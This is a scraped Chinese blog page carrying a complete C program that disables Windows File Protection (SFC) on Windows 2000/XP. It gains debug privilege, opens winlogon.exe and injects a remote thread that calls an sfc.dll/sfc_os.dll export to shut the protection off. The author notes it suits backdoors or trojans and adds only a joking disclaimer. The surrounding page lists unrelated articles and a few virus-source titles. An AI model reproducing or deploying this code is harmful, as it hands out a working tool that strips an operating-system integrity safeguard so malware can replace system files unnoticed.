anti windows sfc mechanism

最新推荐文章于 2025-08-12 18:32:44 发布
最新推荐文章于 2025-08-12 18:32:44 发布
阅读量1.5k 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: windows null access token path function
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xHydra/article/details/590439
本文介绍了一种在Windows系统中禁用SFC文件保护功能的方法。通过使用调试权限注入远程线程到目标进程(winlogon.exe),调用特定DLL中的函数来实现SFC的关闭。适用于Windows 2000及XP系统。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

these codz can remove the windows sfc mechanism, they may play a good role in back door or trojan horse. but, pls don't use them in this way, hohoo...

#include <stdlib.h>
#include "Windows.h"
#include "Tlhelp32.h"
#pragma comment( lib, "Advapi32.lib" )
typedef void (_stdcall * CLOSEEVENTS)(void);
typedef unsigned long DWORD;
typedef DWORD ANTISFC_ACCESS;
/*
* ANTISFC structures
*/
typedef struct _ANTISFC_PROCESS {
DWORD Pid; // process pid
HANDLE ProcessHandle; // process handle
char ImageName[MAX_PATH]; // image name (not full path)
} ANTISFC_PROCESS, *PANTISFC_PROCESS;
__inline void ErrorMessageBox(char *szAdditionInfo)
{
printf("error on %s, error code %d. /n", szAdditionInfo, GetLastError());
}
void usage(char *n) {
printf("usage: %s [/d]/n", n);
printf("/t/d: disable sfc file protecte fuction./n");
exit(0);
}
DWORD Init() {
DWORD Ret = 0;
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
ErrorMessageBox("OpenProcessToken");
} else {
if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue)) {
ErrorMessageBox("LookupPrivilegeValue");
} else {
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Luid = sedebugnameValue;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof tkp, NULL, NULL)) {
ErrorMessageBox("AdjustTokenPrivileges");
} else {
Ret = 1;
}
}
CloseHandle(hToken);
}
return(Ret);
}
DWORD GetPidEx(char *proc_name, char *full_path) {
DWORD dwPid=0;
HANDLE hSnapshot;
PROCESSENTRY32 pe;
BOOL Ret;

if (isdigit(proc_name[0]))
dwPid = strtoul(proc_name, NULL, 0);
else
dwPid = -1;

hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == (HANDLE) -1){
ErrorMessageBox("CreateToolhelp32Snapshot");
return(0);
}
pe.dwSize = sizeof(PROCESSENTRY32);
Ret = Process32First(hSnapshot, &pe);
while (Ret) {
if((strncmp(strlwr(pe.szExeFile), strlwr(proc_name), strlen(proc_name)) == 0)
|| (pe.th32ProcessID == dwPid)) {
dwPid = pe.th32ProcessID;
strcpy(full_path, pe.szExeFile);
break;
}
pe.dwSize = sizeof(PROCESSENTRY32);
Ret = Process32Next(hSnapshot, &pe);
}
CloseHandle(hSnapshot);
if (dwPid == -1)
dwPid = 0;
return(dwPid);
}
DWORD InitProcess(PANTISFC_PROCESS Process, char *proc_name, ANTISFC_ACCESS access) {
DWORD Ret=0;
Process->Pid = GetPidEx(proc_name, Process->ImageName);
if (Process->Pid != 0 && Process->ImageName[0] != 0) {
Process->ProcessHandle = OpenProcess(access, FALSE, Process->Pid);
if (Process->ProcessHandle == NULL)
ErrorMessageBox("OpenProcess");
else
Ret = 1;
}
return(Ret);
}
DWORD InjectThread(PANTISFC_PROCESS Process,
PVOID function) {
HANDLE hThread;
DWORD dwThreadPid = 0, dwState;
hThread = CreateRemoteThread(Process->ProcessHandle,
NULL,
0,
(DWORD (__stdcall *) (void *)) function,
NULL,
0,
&dwThreadPid);
if (hThread == NULL) {
ErrorMessageBox("CreateRemoteThread");
goto cleanup;
}
dwState = WaitForSingleObject(hThread, 4000); // attends 4 secondes
switch (dwState) {
case WAIT_TIMEOUT:
case WAIT_FAILED:
ErrorMessageBox("WaitForSingleObject");
goto cleanup;
case WAIT_OBJECT_0:
break;
default:
ErrorMessageBox("WaitForSingleObject");
goto cleanup;
}
CloseHandle(hThread);
return dwThreadPid;

cleanup:
CloseHandle(hThread);
return 0;
}
int main(int argc, char* argv[])
{
ANTISFC_PROCESS Process;
HMODULE hSfc;
DWORD dwThread;
CLOSEEVENTS pfnCloseEvents;
DWORD dwVersion;
printf("AntiSfc programed by bgate. :) */n/n");
if (argc != 2)
usage(argv[0]);
if (strcmp(argv[1], "/d") != 0) {
usage(argv[0]);
}
if (Init()) {
printf("debug privilege set/n");
} else {
printf("error on get debug privilege/n");
return(0);
}
if(InitProcess(&Process, "winlogon.exe", PROCESS_ALL_ACCESS) == 0) {
printf("error on get process info. /n");
return(0);
}
dwVersion = GetVersion();
if ((DWORD)(LOBYTE(LOWORD(dwVersion))) == 5){ // Windows 2000/XP
if((DWORD)(HIBYTE(LOWORD(dwVersion))) == 0){ //Windows 2000
hSfc = LoadLibrary("sfc.dll");
printf("Win2000/n");
}
else {//if((DWORD)(HIBYTE(LOWORD(dwVersion))) = 1) //Windows XP
hSfc = LoadLibrary("sfc_os.dll");
printf("Windows XP/n");
}
}
//else if () //2003?
else {
printf("unsupported version/n");
}
pfnCloseEvents = (CLOSEEVENTS)GetProcAddress(hSfc,
MAKEINTRESOURCE(2));
if(pfnCloseEvents == NULL){
printf("Load the sfc fuction failed/n");
FreeLibrary(hSfc);
return(0);
}
FreeLibrary(hSfc);
dwThread = InjectThread(&Process,
pfnCloseEvents);

if(dwThread == 0){
printf("failed/n");
}
else{
printf("OK/n");
}
CloseHandle(Process.ProcessHandle);
return(0);
}
xHydra
关注
IT英语4-计算机英语缩写术语
weixin_30394633的博客
04-20 8404
IT英语4-计算机英语缩写术语 1、CPU3DNow!(3D no waiting,无须等待的3D处理)AAM(AMD Analyst Meeting,AMD分析家会议)ABP(Advanced Branch Prediction,高级分支预测)ACG(Aggressive Clock Gating,主动时钟选择)AIS(Alternate Instruction Set,交...
各行业的英语术语(绝对精华3)
usb20ser的专栏
03-26 1万+
b]企业缩写词[/b]5S管理 ABC : 作業制成本制度 (Activity-Based Costing) ABB : 實施作業制預算制度 (Activity-Based Budgeting) ABM : 作業制成本管理 (Activity-Base Management) APS : 先進規畫與排程系統 (Advanced Planning and Scheduling) ASP : 應用程式
Slimming Down Windows XP: The Complete Guide 【 10章完整版 】
FreeXploiT
09-03 4万+
  网上有一个汉化好的 压榨XP手册 是基于他的汉化版 现在我贴出的是英文原版你还可以向作者捐献15$以便获得一个自动优化XP的脚本原文:http://www.bold-fortune.com/forums/index.php?showforum=13Thanks go out to Fred Langa for his acknowledgment of Slimming Down
Win32.Hiv.asm
gzfqh的专栏 →底层代码研究
04-11 2500
哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪[HIV.ASM]哪?COMMENT#谀哪哪哪哪哪哪哪哪? ? Win32.HIV ? 滥哪哪哪哪哪哪哪哪? 谀哪哪哪哪哪哪哪哪哪哪目? by Benny/29A ? 滥哪哪哪哪哪哪哪哪哪哪馁Finally I finished this virus... it took me more than 8 months to code
集中式加密货币交易平台的设计与实现:系统架构、安全机制及优化策略
jared0724的博客
02-04 864
purchase.buy queue.address.monitoringholds.following:
计算机缩写术语完全介绍
左安青的博客
11-06 5万+
计算机缩写术语完全介绍 在使用计算机的过程中,你可能会碰到各种各样的专业术语, 特别是那些英文缩写常让我们不知所云,下面收集了各方面的词组, 希望对大家有帮助。 一、港台术语与内地术语之对照 由于港台的计算机发展相对快一些,许多人都去香港或台湾寻找资料, 但是港台使用的电脑专业术语与内地不尽相同,你也许曾被这些东西弄得糊里糊涂的。 港台术语 内地术语 埠 接口 位元 位 讯号 信号 数码 数字 ...
计算机语言缩写大全
有家客栈 君子不器
09-15 3万+
(源自:http://www.syncr.com/forums/thread/353.aspx)3C(China Compulsory Certification,中国强制性产品认证制度)3D(Three Dimensional,三维)3DCG(3D computer graphics,三维计算机图形)3DNow!(3D no waiting,无须等待的3D处理)3DPA(3D Positional Audio,3D定位音频)3DS(3D SubSystem,三维子系统)3GIO(Third Generat
Win32.Fever.asm
gzfqh的专栏 →底层代码研究
04-11 4031
;============================================================================ ; ; Dengue Hemorrhagic Fever ; ; BioCoded by GriYo / 29A ; griyo@bi0.net ; ;==============================================
CISCO技术(1.7万)
热门推荐
08-09 7万+
0 base|以零为基底\r\n 0 disturbed zero output signal|干扰0输出信号\r\n 0parallel communication cable|平行通讯传输缆线\r\n 1 binary operation|二进制运算\r\n 1 di
Windows Defense Mechanism - Part 1
0pr
12-26 1109
Windows Defender, together with AppLocker, will drastically limit what an attacker can do on the target. This article talks about main Windows Defense mechanisms, namely Windows Defender, AppLocker, ASR, and WDAC.
RMG - Reaction Mechanism Generator-开源
04-28
注意:RMG-Java不再处于主动开发中。 请在以下网址找到用Python编写的最新版本:http://reactionmechanismgenerator.github.io要查看RMG的旧...H,O和S原子)的一般理解来构建由基本化学React步骤组成的动力学模型。
HeterogeneousExpandableList.rar_The Mechanism
09-21
Additional methods that when implemented make an ExpandableListAdapter take advantage of the Adapter view type mechanism.
four_bar_mechanism.rar_Four Bar Mechanism_matlab 四杆机构_matlab四杆机构
09-14
在本资源"four_bar_mechanism.rar"中,包含了一个名为"four_bar_mechanism.m"的MATLAB程序,用于解决四杆机构的运动分析问题。MATLAB是一款强大的数学计算软件,其丰富的函数库和可视化工具使得四杆机构的复杂计算变...
Java 8 Stream API 完全指南:优雅处理集合数据
weixin_62938484的博客
08-12 867
摘要:Java 8的Stream API为集合处理带来了革命性变革,提供声明式的函数式编程方式。文章系统介绍了Stream的核心概念、7种创建方式、中间操作(如filter、map)和终端操作(如collect、reduce),并详解并行流优化技巧。通过电商数据分析等实战案例,展示了Stream在复杂数据处理中的优势,包括代码简洁性、并行处理能力和惰性求值特性。最后给出性能优化建议,并对比传统循环,强调Stream适用于构建数据管道而非完全替代循环。
【Bug经验分享】由jsonObject-TypeReference引发的序列化问题
08-12 654
fastjson.JSONException: syntax error, expect {, actual string , TypeReference序列化异常
集合,完整扩展
最新发布
倾蝶羽裳,漫雨疏狂
08-12 562
本文梳理了Java集合框架中List和Set接口的核心特点与实现类。List接口有序、可重复、支持索引,包含ArrayList(查询快增删慢)、LinkedList(增删快查询慢)和Vector(线程安全)三种实现;Set接口无序、不可重复,包含HashSet(哈希表去重)、TreeSet(自动排序)和LinkedHashSet(保持插入顺序)三种实现。文章通过代码示例展示了各集合类的典型用法,并给出应用场景建议:有序需求用List,去重要求用Set;查询多用ArrayList,增删多用LinkedList
Java研发进阶--学会使用Stream 编程风格
qq_40547893的博客
08-12 165
Java Stream是处理集合数据的强大工具,提供声明式编程风格,使代码更简洁优雅。常用方法包括filter(过滤)、map(转换)、flatMap(扁平化)、distinct(去重)等中间操作,以及collect(收集结果)、reduce(聚合计算)等终端操作。典型应用场景包括数据筛选、转换、分组统计等。推荐使用更简洁的方法引用代替Lambda表达式,避免多层嵌套逻辑。Stream API特别适合复杂数据处理,如按部门分组计算平均工资并排序等场景。虽然调试相对困难,但其代码可读性和功能性优势明显,是现代
Mybatis @Param参数传递说明
qq_53844452的博客
08-11 425
MyBatis参数绑定规则总结:基础类型单参数可任意命名;集合类型默认名list/collection,数组用array;JavaBean直接使用属性名;多参数必须用@Param注解。集合和数组建议显式指定@Param以避免错误,JavaBean无需注解。遵循这些规则可有效防止参数绑定问题,提升代码可读性和稳定性。
Delphi:TList/TObjectList 设计中的 Notify 设计范式
程序猿视角
08-09 1195
Delphi中的TList/TObjectList采用混合设计模式实现灵活的集合管理。其核心是Notify方法,结合了观察者模式(状态变更时通知)和模板方法模式(父类定义流程,子类扩展行为)。当列表执行删除等操作时,自动触发Notify通知,子类TObjectList可重写该方法实现对象释放等定制逻辑。这种设计遵循开闭原则,通过虚方法扩展功能而不修改基类,同时保持职责分离——基类管理数据结构,子类处理业务逻辑。实际实现中需注意操作顺序,先处理业务逻辑再调用父类方法,避免访问已释放内存。这种模式在多种框架中广
深入了解Windows Research Kernel教学平台
- Local procedure call mechanism(本地过程调用机制):这是一种在不同进程间进行通信的机制。 - Security reference monitor(安全引用监控器):负责系统的安全策略实施,如访问控制和身份验证。 - Low-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值